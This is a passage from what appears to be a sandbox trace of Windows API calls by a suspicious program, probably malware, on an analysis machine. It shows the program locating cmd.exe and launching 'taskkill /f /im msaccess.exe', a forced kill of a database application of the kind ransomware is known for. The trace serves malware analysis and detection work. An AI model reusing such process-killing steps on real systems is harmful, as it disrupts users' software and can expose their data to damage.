lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.795] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12451db8 | out: lpFileInformation=0x12451db8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.795] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.796] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451e08 | out: lpFileInformation=0x12451e08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.796] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.796] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12451e58 | out: lpFileInformation=0x12451e58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.796] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.796] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12451ea8 | out: lpFileInformation=0x12451ea8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.796] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.796] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12451ef8 | out: lpFileInformation=0x12451ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.796] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.796] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12451f48 | out: lpFileInformation=0x12451f48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.797] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.797] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12451f98 | out: lpFileInformation=0x12451f98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.797] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.797] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124a2008 | out: lpFileInformation=0x124a2008*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.797] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.797] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124a2058 | out: lpFileInformation=0x124a2058*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.797] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.798] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124a20a8 | out: lpFileInformation=0x124a20a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.798] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.798] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124a20f8 | out: lpFileInformation=0x124a20f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.798] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0207.798] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248a410, nSize=0x64 | out: lpBuffer="") returned 0x63 [0207.798] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2148 | out: lpFileInformation=0x124a2148*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0207.798] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a4e0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0207.798] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2198 | out: lpFileInformation=0x124a2198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0207.799] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0207.799] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0207.799] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0207.799] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0207.799] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0207.799] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0207.799] GetEnvironmentStringsW () returned 0x8ea900* [0207.800] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0207.800] GetCurrentProcess () returned 0xffffffff [0207.800] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12457e30, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12457e30*=0x140) returned 1 [0207.800] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12457e34, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12457e34*=0x144) returned 1 [0207.800] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12457e38, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12457e38*=0x154) returned 1 [0207.801] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im msaccess.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12491500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im msaccess.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x130, hThread=0x158, dwProcessId=0xc44, dwThreadId=0x6f8)) returned 1 [0207.841] CloseHandle (hObject=0x158) returned 1 [0207.841] CloseHandle (hObject=0x154) returned 1 [0207.841] CloseHandle (hObject=0x144) returned 1 [0207.841] CloseHandle (hObject=0x140) returned 1 [0207.841] CloseHandle (hObject=0x13c) returned 1 [0207.841] CloseHandle (hObject=0x138) returned 1 [0207.841] CloseHandle (hObject=0x134) returned 1 [0207.842] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0xffffffff) returned 0x0 [0209.993] SetEvent (hEvent=0x150) returned 1 [0209.993] GetExitCodeProcess (in: hProcess=0x130, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0209.994] GetProcessTimes (in: hProcess=0x130, lpCreationTime=0x1249e0a0, lpExitTime=0x1249e0a8, lpKernelTime=0x1249e0b0, lpUserTime=0x1249e0b8 | out: lpCreationTime=0x1249e0a0, lpExitTime=0x1249e0a8, lpKernelTime=0x1249e0b0, lpUserTime=0x1249e0b8) returned 1 [0209.994] CloseHandle (hObject=0x130) returned 1 [0210.001] SetEvent (hEvent=0x128) returned 1 [0210.002] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247c680, nSize=0x64 | out: lpBuffer="") returned 0x35 [0210.002] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496238 | out: lpFileInformation=0x12496238*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.003] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.004] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12496288 | out: lpFileInformation=0x12496288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.004] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.004] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124962d8 | out: lpFileInformation=0x124962d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.004] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.004] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12496328 | out: lpFileInformation=0x12496328*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.004] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.004] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12496378 | out: lpFileInformation=0x12496378*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.004] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.004] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124963c8 | out: lpFileInformation=0x124963c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.004] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.004] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12496418 | out: lpFileInformation=0x12496418*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.005] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.005] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12496468 | out: lpFileInformation=0x12496468*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.005] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.005] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124964b8 | out: lpFileInformation=0x124964b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.005] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.005] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12496508 | out: lpFileInformation=0x12496508*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.005] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.005] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12496558 | out: lpFileInformation=0x12496558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.006] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.006] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124965a8 | out: lpFileInformation=0x124965a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.006] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0210.006] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1247c750, nSize=0x64 | out: lpBuffer="") returned 0x63 [0210.006] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124965f8 | out: lpFileInformation=0x124965f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0210.006] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247c820, nSize=0x64 | out: lpBuffer="") returned 0x35 [0210.006] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496648 | out: lpFileInformation=0x12496648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0210.007] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0210.007] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0210.007] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 